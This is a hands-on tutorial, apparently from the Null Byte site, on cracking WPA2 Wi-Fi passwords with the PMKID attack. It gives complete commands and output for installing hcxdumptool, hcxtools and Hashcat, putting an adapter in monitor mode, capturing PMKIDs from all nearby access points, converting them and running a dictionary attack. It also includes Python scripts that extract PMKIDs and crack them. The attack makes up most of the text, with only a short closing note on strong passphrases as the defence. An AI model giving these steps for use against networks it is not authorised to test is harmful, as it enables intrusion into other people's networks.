WPA2 password cracking has worked the same way for years, but a newer attack needs less interaction and less information than earlier techniques and has the added advantage of working against access points with no clients connected at all. The PMKID attack uses Hashcat to crack WPA passwords and lets attackers find networks with weak passwords far more easily.
The old way to crack WPA2 passwords
The old way of cracking WPA2 has been around for a long time and involves disconnecting a connected device from the access point we want to attack. It has two disadvantages that every Wi-Fi hacker should understand.
The first drawback is that someone must already be connected to the network for the attack to work. The network password may be weak and trivial to break, but without a device connected for at least a moment there is no handshake to capture, and so nothing to crack.
The second disadvantage is that the tactic is noisy and legally questionable, because it means sending packets that deliberately knock an authorized user off a service they pay for. That kind of unauthorized interference is technically a denial-of-service attack and, if sustained, is no different from jamming the network. It can get you into trouble, and it is easily detected, as some of our earlier guides show.
A new method for cracking passwords
Instead of relying on two-way communication between Wi-Fi devices, the new method lets an attacker talk directly to a vulnerable access point. On August 4, 2018, a post on the Hashcat forum described a new technique that uses the RSN IE (Robust Security Network Information Element) of a single EAPOL frame to capture the information needed for a brute-force attack. The access point sends that first EAPOL frame to any station that associates, before the station has proven it knows the password, which is why the attacker's own card can trigger it without a real client being present.
As with earlier attacks on WPA, the attacker must be within range of the target network. The goal is to use a Kali-compatible wireless network adapter to collect the information needed to brute-force the password. Instead of Aireplay-ng or Aircrack-ng, we use a newer wireless attack toolkit called hcxtools. These tools let us interact with nearby Wi-Fi networks to record WPA handshakes and PMKID hashes. The capture tool works much like Besside-ng: it needs minimal arguments to start an attack from the command line, it can be run against specific targets or targets of opportunity, and it runs comfortably over SSH on a Raspberry Pi or another headless device.
After a PMKID has been captured, the next step is to load the hash into Hashcat and try to crack the password. Here hcxtools differs from Besside-ng, because a conversion step is needed to prepare the file for Hashcat. We will use hcxpcaptool to convert our PCAPNG capture into a format Hashcat can read, leaving only the job of choosing a good password list for the brute-force attempt.
It is worth noting that not every network is vulnerable to this attack. The PMKID is an optional element that only some manufacturers' firmware includes, so you cannot expect universal success. Whether you can capture a PMKID depends on whether the access point puts one in the RSN IE of its first EAPOL frame, and whether you can crack a captured PMKID depends on whether the underlying password is in your wordlist. If either condition is not met, the attack fails.
To try this attack, you need Kali Linux and a wireless network adapter that supports monitor mode and packet injection. We have several guides on choosing a compatible wireless network adapter linked below.
Along with a Kali-compatible network adapter, make sure your system is fully updated and upgraded. If it is not, some packages may be out of date and cause problems during capture.
Recommended: The Alfa AWUS036NHA 2.4 GHz
Step 1: Install hcxdumptool, hcxtools and Hashcat
First, we will install the tools we need. Type the following in a terminal window to download hcxdumptool.
~# git clone https://github.com/ZerBea/hcxdumptool.git
Cloning into 'hcxdumptool'...
remote: Enumerating objects: 133, done.
remote: Counting objects: 100% (133/133), done.
remote: Compressing objects: 100% (97/97), done.
remote: Total 2127 (delta 82), reused 76 (delta 36), pack-reused 1994
Receiving objects: 100% (2127/2127), 759.53 KiB | 1.79 MiB/s, done.
Resolving deltas: 100% (1434/1434), done.
Then change into the directory and finish the installation with make followed by make install.
~# cd hcxdumptool
~/hcxdumptool# make
cc -O3 -Wall -Wextra -std=gnu99 -o hcxpioff hcxpioff.c
cc -O3 -Wall -Wextra -std=gnu99 -o hcxdumptool hcxdumptool.c -lcrypto
~/hcxdumptool# make install
cc -O3 -Wall -Wextra -std=gnu99 -o hcxpioff hcxpioff.c
cc -O3 -Wall -Wextra -std=gnu99 -o hcxdumptool hcxdumptool.c -lcrypto
install -m 0755 -D hcxpioff /usr/local/bin/hcxpioff
install -m 0755 -D hcxdumptool /usr/local/bin/hcxdumptool
rm -f hcxpioff
rm -f hcxdumptool
rm -f *.o *~
When that finishes, we move on to hcxtools. Open a new terminal window or leave the hcxdumptool directory, then clone hcxtools.
~/hcxdumptool# cd
~# git clone https://github.com/ZerBea/hcxtools.git
Cloning into 'hcxtools'...
remote: Enumerating objects: 120, done.
remote: Counting objects: 100% (120/120), done.
remote: Compressing objects: 100% (82/82), done.
remote: Total 6196 (delta 77), reused 79 (delta 38), pack-reused 6076
Receiving objects: 100% (6196/6196), 1.89 MiB | 5.02 MiB/s, done.
Resolving deltas: 100% (4320/4320), done.
Then change into the directory and run make and make install as before. If you get a permission error, prefix the command with sudo.
~# cd hcxtools
~/hcxtools# make
mkdir -p .deps
cc -O3 -Wall -Wextra -std=gnu99 -MMD -MF .deps/hcxpcapngtool.d -o hcxpcapngtool hcxpcapngtool.c -lz -lcrypto
cc -O3 -Wall -Wextra -std=gnu99 -MMD -MF .deps/hcxhashtool.d -o hcxhashtool hcxhashtool.c -lcrypto -lcurl
cc -O3 -Wall -Wextra -std=gnu99 -MMD -MF .deps/hcxpsktool.d -o hcxpsktool hcxpsktool.c -lcrypto
cc -O3 -Wall -Wextra -std=gnu99 -MMD -MF .deps/hcxwltool.d -o hcxwltool hcxwltool.c
cc -O3 -Wall -Wextra -std=gnu99 -MMD -MF .deps/wlancap2wpasec.d -o wlancap2wpasec wlancap2wpasec.c -lcurl
cc -O3 -Wall -Wextra -std=gnu99 -MMD -MF .deps/whoismac.d -o whoismac whoismac.c -lcurl
cc -O3 -Wall -Wextra -std=gnu99 -MMD -MF .deps/hcxpmkidtool.d -o hcxpmkidtool hcxpmkidtool.c -lcrypto -lpthread
cc -O3 -Wall -Wextra -std=gnu99 -MMD -MF .deps/wlanhcx2john.d -o wlanhcx2john wlanhcx2john.c
cc -O3 -Wall -Wextra -std=gnu99 -MMD -MF .deps/hcxpcaptool.d -o hcxpcaptool hcxpcaptool.c -lz -lcrypto
cc -O3 -Wall -Wextra -std=gnu99 -MMD -MF .deps/hcxhashcattool.d -o hcxhashcattool hcxhashcattool.c -lcrypto -lpthread
cc -O3 -Wall -Wextra -std=gnu99 -MMD -MF .deps/hcxmactool.d -o hcxmactool hcxmactool.c
cc -O3 -Wall -Wextra -std=gnu99 -MMD -MF .deps/hcxessidtool.d -o hcxessidtool hcxessidtool.c
cc -O3 -Wall -Wextra -std=gnu99 -MMD -MF .deps/hcxhash2cap.d -o hcxhash2cap hcxhash2cap.c
cc -O3 -Wall -Wextra -std=gnu99 -MMD -MF .deps/wlanhc2hcx.d -o wlanhc2hcx wlanhc2hcx.c
cc -O3 -Wall -Wextra -std=gnu99 -MMD -MF .deps/wlanwkp2hcx.d -o wlanwkp2hcx wlanwkp2hcx.c
cc -O3 -Wall -Wextra -std=gnu99 -MMD -MF .deps/wlanhcxinfo.d -o wlanhcxinfo wlanhcxinfo.c
cc -O3 -Wall -Wextra -std=gnu99 -MMD -MF .deps/wlanhcx2ssid.d -o wlanhcx2ssid wlanhcx2ssid.c
cc -O3 -Wall -Wextra -std=gnu99 -MMD -MF .deps/wlanhcxcat.d -o wlanhcxcat wlanhcxcat.c -lcrypto
cc -O3 -Wall -Wextra -std=gnu99 -MMD -MF .deps/wlanpmk2hcx.d -o wlanpmk2hcx wlanpmk2hcx.c -lcrypto
cc -O3 -Wall -Wextra -std=gnu99 -MMD -MF .deps/wlanjohn2hcx.d -o wlanjohn2hcx wlanjohn2hcx.c
cc -O3 -Wall -Wextra -std=gnu99 -MMD -MF .deps/wlancow2hcxpmk.d -o wlancow2hcxpmk wlancow2hcxpmk.c
~/hcxtools# make install
install -m 0755 -D hcxpcapngtool /usr/local/bin/hcxpcapngtool
install -m 0755 -D hcxhashtool /usr/local/bin/hcxhashtool
install -m 0755 -D hcxpsktool /usr/local/bin/hcxpsktool
install -m 0755 -D hcxwltool /usr/local/bin/hcxwltool
install -m 0755 -D wlancap2wpasec /usr/local/bin/wlancap2wpasec
install -m 0755 -D whoismac /usr/local/bin/whoismac
install -m 0755 -D hcxpmkidtool /usr/local/bin/hcxpmkidtool
install -m 0755 -D wlanhcx2john /usr/local/bin/wlanhcx2john
install -m 0755 -D hcxpcaptool /usr/local/bin/hcxpcaptool
install -m 0755 -D hcxhashcattool /usr/local/bin/hcxhashcattool
install -m 0755 -D hcxmactool /usr/local/bin/hcxmactool
install -m 0755 -D hcxessidtool /usr/local/bin/hcxessidtool
install -m 0755 -D hcxhash2cap /usr/local/bin/hcxhash2cap
install -m 0755 -D wlanhc2hcx /usr/local/bin/wlanhc2hcx
install -m 0755 -D wlanwkp2hcx /usr/local/bin/wlanwkp2hcx
install -m 0755 -D wlanhcxinfo /usr/local/bin/wlanhcxinfo
install -m 0755 -D wlanhcx2ssid /usr/local/bin/wlanhcx2ssid
install -m 0755 -D wlanhcxcat /usr/local/bin/wlanhcxcat
install -m 0755 -D wlanpmk2hcx /usr/local/bin/wlanpmk2hcx
install -m 0755 -D wlanjohn2hcx /usr/local/bin/wlanjohn2hcx
install -m 0755 -D wlancow2hcxpmk /usr/local/bin/wlancow2hcxpmk
Finally, we need Hashcat, which is easy because it is in the standard Kali Linux repository. Type the following to install the latest version.
~/hcxtools# cd
~# apt install hashcat
Reading package lists... Done
Building dependency tree
Reading state information... Done
hashcat is already the newest version (5.1.0+ds1-1).
The following packages were automatically installed and are no longer required:
  libdouble-conversion1 liblinear3
Use 'apt autoremove' to remove them.
0 upgraded, 0 newly installed, 0 to remove and 1863 not upgraded.
With that done, we can move on to setting up the wireless network adapter.
Step 2: Prepare the wireless network adapter
After plugging in your Kali-compatible wireless network adapter, find its name with ifconfig or ip a. It is usually wlan0, or wlan1 if the machine already has a built-in card, as in the output below. The first step is to put the card into monitor mode so we can listen to Wi-Fi traffic in the area.
To do so, type the following in a terminal window, substituting the name of your adapter for wlan0.
~# airmon-ng start wlan0

Found 3 processes that could cause trouble.
Kill them using 'airmon-ng check kill' before putting
the card in monitor mode, they will interfere by changing channels
and sometimes putting the interface back in managed mode

  PID Name
  555 NetworkManager
  611 wpa_supplicant
 6636 dhclient

PHY     Interface   Driver      Chipset

phy0    wlan0       ath9k       Qualcomm Atheros QCA9565 / AR9565 Wireless Network Adapter (rev 01)
                (mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)
                (mac80211 station mode vif disabled for [phy0]wlan0)
phy1    wlan1       ath9k_htc   Atheros Communications, Inc. AR9271 802.11n
Your adapter should now be named something like wlan0mon and be in monitor mode. You can confirm this by running ifconfig again.
Step 3: Use hcxdumptool to capture PMKIDs from nearby networks
Now we are ready to capture PMKIDs from the access points we want to attack. With our wireless adapter in monitor mode as wlan1mon, we run the following command to start the attack.
~# hcxdumptool -i wlan1mon -o galleria.pcapng --enable_status=1
Breaking this down: -i tells the program which interface to use, in this case wlan1mon. The file the results are written to is given with -o. A single channel to scan can be chosen with -c followed by the channel number; without it the tool hops across channels.
In the command above we use wlan1mon and save captured PMKIDs to a file called galleria.pcapng. The value after --enable_status selects which status messages are printed (1 shows the EAPOL events we care about); although other values are accepted, I have not had success with anything except 1.
warning: NetworkManager is running with pid 555
warning: wpa_supplicant is running with pid 611
warning: wlan1mon is probably a monitor interface

start capturing (stop with ctrl+c)
INTERFACE:...............: wlan1mon
FILTERLIST...............: 0 entries
MAC CLIENT...............: fcc233ca8bc5
MAC ACCESS POINT.........: 10ae604b9e82 (incremented on every new client)
EAPOL TIMEOUT............: 150000
REPLAYCOUNT..............: 62439
ANONCE...................: d8dd2206c82ad030e843a39e8f99281e215492dbef56f693cd882d4dfcde9956

[22:17:32 - 001] c8b5adb615ea -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS]
[22:17:32 - 001] c8b5adb615e9 -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS]
[22:17:33 - 001] 2c95694f3ca0 -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS]
[22:17:33 - 001] 2c95694f3ca0 -> b4b686abc81a [FOUND PMKID]
[22:17:48 - 011] 14edbb9938ea -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS]
[22:17:48 - 011] 88964e3a8ea0 -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS]
[22:17:49 - 011] dc7fa425888a -> fcc233ca8bc5
[22:17:49 - 011] 88964e801fa0 -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS]
[22:17:57 - 001] 9822efc6fdff -> ba634d3eb80d [EAPOL 4/4 - M4 RETRY ATTACK]
[22:17:57 - 001] 9822efc6fdff -> ba634d3eb80d [FOUND HANDSHAKE AP-LESS, EAPOL TIMEOUT 6696]
[22:18:04 - 011] 803773defd01 -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS]
[22:19:21 - 011] 14edbb9ba0e6 -> 803773defd01 [FOUND AUTHORIZED HANDSHAKE, EAPOL TIMEOUT 15247]
[22:19:34 - 006] 0618d629465b -> 58fb8433aac2 [FOUND AUTHORIZED HANDSHAKE, EAPOL TIMEOUT 2832]
[22:19:42 - 005] e0220203294e -> fcc233ca8bc5
[22:19:42 - 005] 14edbb9ba0e6 -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS]
[22:20:02 - 008] 14edbbd29326 -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS]
[22:20:04 - 008] 1c872c707c60 -> 78e7d17791e7 [FOUND PMKID]
[22:20:11 - 009] e0220453a576 -> ...
INFO: cha=2, rx=32752, rx(dropped)=2801, tx=2205, powned=18, err=0
A few things are worth reading in this output. MAC CLIENT and MAC ACCESS POINT are the addresses hcxdumptool itself uses when it poses as a client or as an access point. Lines tagged FOUND PMKID CLIENT-LESS are PMKIDs obtained with no real client present: the tool associated to the access point using its own client address, and the access point answered with a first EAPOL frame that carried the PMKID. Lines tagged FOUND PMKID came from a real client's exchange, and the FOUND HANDSHAKE lines are ordinary four-way handshakes that can still be cracked the old way. Once you have collected enough, stop the program with Ctrl+C. This leaves a PCAPNG file containing what we need for the brute-force attempt, but it must first be converted into a format Hashcat understands.
Step 4: Convert the capture with hcxpcaptool
To convert the PCAPNG file, we use hcxpcaptool with a few arguments. In the directory holding the .pcapng file, run the following in a terminal window.
~# hcxpcaptool -E essidlist -I identitylist -U usernamelist -z galleriaHC.16800 galleria.pcapng
This tells hcxpcaptool to pull useful side information out of the capture as well as the hashes: -E writes every ESSID it sees to essidlist, -I writes any EAP identities to identitylist and -U any usernames to usernamelist, all of which make good wordlist material for Hashcat. The -z flag (lowercase) names the PMKID hash file Hashcat will read, and the last argument is the PCAPNG file to convert.
Running the command should show the following.
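To make the conversion step concrete, here is an added example (not the article's code and not part of hcxtools) that builds a constructed EAPOL-Key message 1 of the kind an access point sends when it supports PMKID caching, finds the PMKID KDE (OUI 00-0F-AC, type 4) in its key data, and emits the same PMKID*MAC_AP*MAC_STA*ESSID line that hcxpcaptool -z writes. The MAC addresses, ESSID and passphrase are invented; the PMKID is computed from them so the frame is internally consistent. The second call shows the "not vulnerable" case from earlier: an access point whose first EAPOL frame carries no PMKID yields nothing to convert.

```python
import hashlib
import hmac
import struct
from typing import Optional

# Added example, not code from the article or from hcxtools. It constructs an
# EAPOL-Key message 1 the way an access point that caches PMKIDs sends it, then
# does what hcxpcaptool -z does: finds the PMKID KDE in the key data and emits
# a hashcat 16800 line. MACs, ESSID and passphrase below are invented.

AP_MAC = bytes.fromhex("10ae604b9e82")    # assumed access point address
STA_MAC = bytes.fromhex("fcc233ca8bc5")   # assumed station (client) address
ESSID = b"galleria"                       # constructed network name
PASSPHRASE = b"password123"               # constructed weak passphrase

# KDE header inside EAPOL key data: OUI 00-0F-AC (IEEE 802.11), data type 4 = PMKID
PMKID_KDE = bytes.fromhex("000fac04")
KEY_DATA_OFFSET = 99   # 4-byte 802.1X header + 95 fixed bytes of the EAPOL-Key descriptor


def pmkid_from_passphrase(passphrase: bytes, essid: bytes, ap_mac: bytes, sta_mac: bytes) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, ESSID, 4096 iterations, 32 bytes);
    PMKID = first 128 bits of HMAC-SHA1(PMK, "PMK Name" || AA || SPA)."""
    pmk = hashlib.pbkdf2_hmac("sha1", passphrase, essid, 4096, 32)
    return hmac.new(pmk, b"PMK Name" + ap_mac + sta_mac, hashlib.sha1).digest()[:16]


def build_eapol_m1(pmkid: Optional[bytes]) -> bytes:
    """Constructed EAPOL-Key message 1 (802.1X header + RSN key descriptor).
    Key Information 0x008a = descriptor version 2, pairwise key, Key Ack set, no MIC.
    With pmkid=None the key data is empty, like an AP that never sends a PMKID."""
    key_data = b""
    if pmkid is not None:
        key_data = b"\xdd" + bytes([len(PMKID_KDE) + len(pmkid)]) + PMKID_KDE + pmkid
    body = (
        b"\x02"                      # descriptor type 2 = RSN
        + struct.pack(">H", 0x008A)  # key information
        + struct.pack(">H", 16)      # key length (CCMP)
        + b"\x00" * 8                # replay counter
        + b"\x11" * 32               # ANonce (arbitrary here)
        + b"\x00" * 16               # key IV
        + b"\x00" * 8                # key RSC
        + b"\x00" * 8                # reserved
        + b"\x00" * 16               # key MIC (not present in message 1)
        + struct.pack(">H", len(key_data))
        + key_data
    )
    return b"\x02\x03" + struct.pack(">H", len(body)) + body  # 802.1X v2, type 3 = EAPOL-Key


def extract_pmkid(eapol: bytes) -> Optional[bytes]:
    """Return the PMKID carried in an EAPOL-Key message 1, or None if the frame
    is not message 1 or its key data carries no PMKID KDE."""
    if len(eapol) < KEY_DATA_OFFSET or eapol[1] != 3 or eapol[4] != 2:
        return None
    key_info = struct.unpack(">H", eapol[5:7])[0]
    if not key_info & 0x0080 or key_info & 0x0100:   # message 1: Key Ack set, Key MIC clear
        return None
    key_data_len = struct.unpack(">H", eapol[97:99])[0]
    key_data = eapol[KEY_DATA_OFFSET:KEY_DATA_OFFSET + key_data_len]
    pos = 0
    while pos + 2 <= len(key_data):          # walk the tag/length/value elements
        tag, length = key_data[pos], key_data[pos + 1]
        value = key_data[pos + 2:pos + 2 + length]
        if tag == 0xDD and len(value) == 20 and value[:4] == PMKID_KDE:
            return value[4:]
        pos += 2 + length                    # any other KDE or IE is skipped
    return None


def to_hashcat_16800(pmkid: bytes, ap_mac: bytes, sta_mac: bytes, essid: bytes) -> str:
    """hashcat -m 16800 input line: PMKID*MAC_AP*MAC_STA*ESSID, all hex, no separators."""
    return "*".join([pmkid.hex(), ap_mac.hex(), sta_mac.hex(), essid.hex()])


if __name__ == "__main__":
    real_pmkid = pmkid_from_passphrase(PASSPHRASE, ESSID, AP_MAC, STA_MAC)
    got = extract_pmkid(build_eapol_m1(real_pmkid))
    print("vulnerable AP  ->", to_hashcat_16800(got, AP_MAC, STA_MAC, ESSID))
    print("no PMKID in M1 ->", extract_pmkid(build_eapol_m1(None)))
```

Run it directly to print the hash line. The frame layout used here (4-byte 802.1X header, then the 95 fixed bytes of the EAPOL-Key descriptor, then the key data) is the one Wireshark shows under EAPOL-Key; real frames may carry other KDEs in the key data, which the loop simply skips.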
summary:
--------
file name....................: galleria.pcapng
file type....................: pcapng 1.0
file hardware information....: x86_64
file os information..........: Linux 4.18.0-kali2-amd64
file application information.: hcxdumptool 4.2.1
network type.................: DLT_IEEE802_11_RADIO (127)
endianness...................: little endian
read errors..................: flawless
packets inside...............: 1089
skipped packets..............: 0
packets with GPS data........: 0
packets with FCS.............: 732
beacons (with ESSID inside)..: 49
probe requests...............: 26
probe responses..............: 40
association requests.........: 103
association responses........: 204
reassociation requests.......: 2
reassociation responses......: 7
authentications (OPEN SYSTEM): 346
authentications (BROADCOM)...: 114
authentications (APPLE)......: 1
EAPOL packets................: 304
EAPOL PMKIDs.................: 21
best handshakes..............: 4 (ap-less: 1)

21 PMKID(s) written to galleriaHC.16800
Here we can see that we collected 21 PMKIDs in a short time. Now we can feed the galleriaHC.16800 file to Hashcat to try to crack the network passwords.
Step 5: Select a Password List and Brute Force with Hashcat
To attack the hashes we captured, we need a good password list. You can find several to start with in the SecLists collection. Once you have a wordlist, put it in the same directory as the .16800 file you just converted and run the following in a terminal window.
~# hashcat -m 16800 galleriaHC.16800 -a 0 --kernel-accel=1 -w 4 --force 'topwifipass.txt'
This launches Hashcat in mode 16800, which is for WPA-PMKID-PBKDF2 hashes. Next comes the file to crack, in this case galleriaHC.16800. The -a flag sets the attack mode; 0 is a straight dictionary attack. -w 4 selects the most aggressive workload profile, and --kernel-accel=1 manually pins the kernel acceleration value; that combination gave the best performance here. If your computer struggles, lower the number after -w.
The --force option ignores warnings and continues the attack, and the final argument is the wordlist to use against the PMKIDs in our file, here topwifipass.txt. Be aware that --force also silences Hashcat's warning about unsupported OpenCL runtimes, which can produce false negatives, so only use it when you know what Hashcat is complaining about.
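What Hashcat does with those lines is small enough to show in full. The following is an added example (not the article's code and not hashcat) that parses 16800 lines, derives the PMK with PBKDF2-HMAC-SHA1 over the ESSID, and tests every candidate against every PMKID. It groups hashes by ESSID so the expensive PBKDF2 runs once per candidate per salt, which is why Hashcat's banner reports fewer unique salts than digests. It also shows the two conditions stated earlier: the weak passphrase in the wordlist falls, the strong one does not, and candidates outside WPA2's 8 to 63 character range are rejected without being hashed. The hash lines are constructed from invented passphrases and addresses.

```python
import hashlib
import hmac
from collections import defaultdict
from typing import Dict, List, Tuple

# Added example, not the article's code and not hashcat. It performs, in plain
# Python, the work hashcat -m 16800 does: parse PMKID*MAC_AP*MAC_STA*ESSID lines,
# derive PMK = PBKDF2-HMAC-SHA1(candidate, ESSID, 4096, 32) once per candidate
# and ESSID, and compare HMAC-SHA1-128(PMK, "PMK Name" || AP || STA) with each
# captured PMKID. The hash lines and the wordlist are constructed for the demo.


def parse_16800(line: str) -> Tuple[bytes, bytes, bytes, bytes]:
    """Split a hashcat 16800 line into (pmkid, ap_mac, sta_mac, essid) as raw bytes."""
    pmkid_hex, ap_hex, sta_hex, essid_hex = line.strip().split("*")
    return (bytes.fromhex(pmkid_hex), bytes.fromhex(ap_hex),
            bytes.fromhex(sta_hex), bytes.fromhex(essid_hex))


def pmkid_from_pmk(pmk: bytes, ap_mac: bytes, sta_mac: bytes) -> bytes:
    """PMKID is the first 16 bytes of HMAC-SHA1 over "PMK Name" || AA || SPA."""
    return hmac.new(pmk, b"PMK Name" + ap_mac + sta_mac, hashlib.sha1).digest()[:16]


def make_16800_line(passphrase: str, essid: str, ap_hex: str, sta_hex: str) -> str:
    """Build a sample hash line from a known passphrase (used only to construct demo data)."""
    pmk = hashlib.pbkdf2_hmac("sha1", passphrase.encode(), essid.encode(), 4096, 32)
    pmkid = pmkid_from_pmk(pmk, bytes.fromhex(ap_hex), bytes.fromhex(sta_hex))
    return "*".join([pmkid.hex(), ap_hex, sta_hex, essid.encode().hex()])


def crack_pmkids(lines: List[str], wordlist: List[str]) -> Dict[str, str]:
    """Dictionary attack over every hash line; returns {hash line: passphrase} for hits."""
    # Group hashes by ESSID: the ESSID is the PBKDF2 salt, so one expensive PBKDF2
    # per candidate serves every access point and client pair with that name.
    by_essid: Dict[bytes, List[Tuple[str, bytes, bytes, bytes]]] = defaultdict(list)
    for line in lines:
        pmkid, ap_mac, sta_mac, essid = parse_16800(line)
        by_essid[essid].append((line, pmkid, ap_mac, sta_mac))

    found: Dict[str, str] = {}
    for word in wordlist:
        candidate = word.encode()
        if not 8 <= len(candidate) <= 63:   # WPA2-PSK bounds; hashcat counts these as Rejected
            continue
        for essid, targets in by_essid.items():
            pmk = hashlib.pbkdf2_hmac("sha1", candidate, essid, 4096, 32)  # the slow step
            for line, pmkid, ap_mac, sta_mac in targets:
                if line not in found and hmac.compare_digest(pmkid_from_pmk(pmk, ap_mac, sta_mac), pmkid):
                    found[line] = word
    return found


# Constructed capture: two access points named "galleria" (one weak, one strong
# passphrase) and one "CoffeeShop"; every address and passphrase is invented.
SAMPLE_HASHES = [
    make_16800_line("letmein1", "galleria", "10ae604b9e82", "fcc233ca8bc5"),
    make_16800_line("Vq7#pL2!xK9$wE4", "galleria", "c8b5adb615ea", "fcc233ca8bc5"),
    make_16800_line("coffee2018", "CoffeeShop", "2c95694f3ca0", "b4b686abc81a"),
]
WORDLIST = ["short", "12345678", "password", "letmein1", "coffee2018", "galleria"]


if __name__ == "__main__":
    for line, passphrase in crack_pmkids(SAMPLE_HASHES, WORDLIST).items():
        print(line.split("*")[1], "->", passphrase)
```

Running it prints the two access points whose passphrases were in the wordlist; the third, with a long random passphrase, stays uncracked however long the list is, which is the defense this whole attack cannot get around.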
hashcat (v4.2.1) starting...

OpenCL Platform #1: The pocl project
====================================
* Device #1: pthread-AMD A8-6410 APU with AMD Radeon R5 Graphics, 2553/2553 MB allocatable, 4MCU

Hashes: 21 digests; 21 unique digests, 20 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Applicable optimizers:
* Zero-Byte
* Slow-Hash-SIMD-LOOP

Minimum password length supported by kernel: 8
Maximum password length supported by kernel: 63

Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.

* Device #1: build_opts '-cl-std=CL1.1 -I OpenCL -I /usr/share/hashcat/OpenCL -D VENDOR_ID=64 -D CUDA_ARCH=0 -D AMD_ROCM=0 -D VECT_SIZE=4 -D DEVICE_TYPE=2 -D DGST_R0=0 -D DGST_R1=1 -D DGST_R2=2 -D DGST_R3=3 -D DGST_ELEM=4 -D KERN_TYPE=16800 -D _unroll'
Dictionary cache hit:
* Filename..: topwifipass.txt
* Passwords.: 4801
* Bytes.....: 45277
* Keyspace..: 4801

[s]tatus [p]ause [b]ypass [c]heckpoint [q]uit =>
Depending on your hardware and the size of your wordlist, this can take quite a while. Press S at any time for a status update.
While Hashcat runs, you can check its progress to see whether any keys have been recovered.
Hash.Type........: WPA-PMKID-PBKDF2
Hash.Target......: galleriaHC.16800
Time.Started.....: Sun Oct 28 22:32:57 2018 (7 mins, 50 secs)
Time.Estimated...: Sun Oct 28 22:57:50 2018 (17 mins, 3 secs)
Guess.Base.......: File (topwifipass.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.Dev.#1.....:       64 H/s (15.43ms) @ Accel:1 Loops:1024 Thr:1 Vec:4
Recovered........: 0/21 (0.00%) Digests, 0/20 (0.00%) Salts
Progress.........: 30180/96020 (31.43%)
Rejected.........: 0/30180 (0.00%)
Restore.Point....: 1508/4801 (31.41%)
Candidates.#1....: peter123 -> money man
HWMon.Dev.#1.....: N/A

[s]tatus [p]ause [b]ypass [c]heckpoint [q]uit =>

Session..........: hashcat
Status...........: Running
Hash.Type........: WPA-PMKID-PBKDF2
Hash.Target......: galleriaHC.16800
Time.Started.....: Sun Oct 28 22:32:57 2018 (19 mins, 56 secs)
Time.Estimated...: Sun Oct 28 22:57:54 2018 (5 mins, 3 secs)
Guess.Base.......: File (topwifipass.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.Dev.#1.....:       64 H/s (15.24ms) @ Accel:1 Loops:1024 Thr:1 Vec:4
Recovered........: 0/21 (0.00%) Digests, 0/20 (0.00%) Salts
Progress.........: 76736/96020 (79.92%)
Rejected.........: 0/76736 (0.00%)
Restore.Point....: 3836/4801 (79.90%)
Candidates.#1....: monopoli -> mercenary
HWMon.Dev.#1.....: N/A

[s]tatus [p]ause [b]ypass [c]heckpoint [q]uit =>
Note that Progress counts the keyspace multiplied by the number of unique salts (4801 words times 20 ESSIDs), since every candidate has to be derived separately for each network name. As the wordlist runs out, Hashcat automatically adjusts the workload and prints a final report when it finishes. The report below is from a separate, smaller run against a two-hash file.
Approaching final keyspace - workload adjusted.

Session..........: hashcat
Status...........: Exhausted
Hash.Type........: WPA-PMKID-PBKDF2
Hash.Target......: hotspotcap.16800
Time.Started.....: Sun Oct 28 18:05:57 2018 (3 mins, 49 secs)
Time.Estimated...: Sun Oct 28 18:09:46 2018 (0 secs)
Guess.Base.......: File (topwifipass.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.Dev.#1.....:       42 H/s (15.56ms) @ Accel:1 Loops:1024 Thr:1 Vec:4
Recovered........: 0/2 (0.00%) Digests, 0/2 (0.00%) Salts
Progress.........: 9602/9602 (100.00%)
Rejected.........: 2/9602 (0.02%)
Restore.Point....: 4801/4801 (100.00%)
Candidates.#1....: 159159159 -> 00001111
HWMon.Dev.#1.....: N/A

Started: Sun Oct 28 18:05:56 2018
Stopped: Sun Oct 28 18:09:49 2018
Any passwords you cracked are shown here. In our test run none of the PMKIDs we collected matched a password in our list, so no hashes were cracked. That will likely be your result for networks with strong passwords too, but expect to see results for networks with weak ones.
The PMKID Hashcat attack makes Wi-Fi attacks easier
While the new attack on Wi-Fi passwords makes it easier for hackers to attempt an attack on a target, the same defenses that worked against earlier types of WPA cracking remain effective: a long, random passphrase is not in any wordlist. If your access point does not include the PMKID in its robust security element at all, this attack cannot succeed. You can check your own network with hcxtools to see whether it exposes one.
Because these attacks rely on guessing the password the Wi-Fi network uses, there are two common sources of guesses. The first is users who pick poor or default passwords such as '12345678' or 'password'; these crack instantly. The second is data breaches that expose millions of real user passwords. Because many people reuse passwords across different kinds of accounts, those lists are often very effective against Wi-Fi networks.
I hope you enjoyed this guide to the new PMKID-based Hashcat attack on WPA2 passwords! If you have questions about this Wi-Fi password cracking tutorial or a comment, you can reach me on Twitter @KodyKinzie.
Don't Miss: Null Byte's collection of Wi-Fi Hacking Guides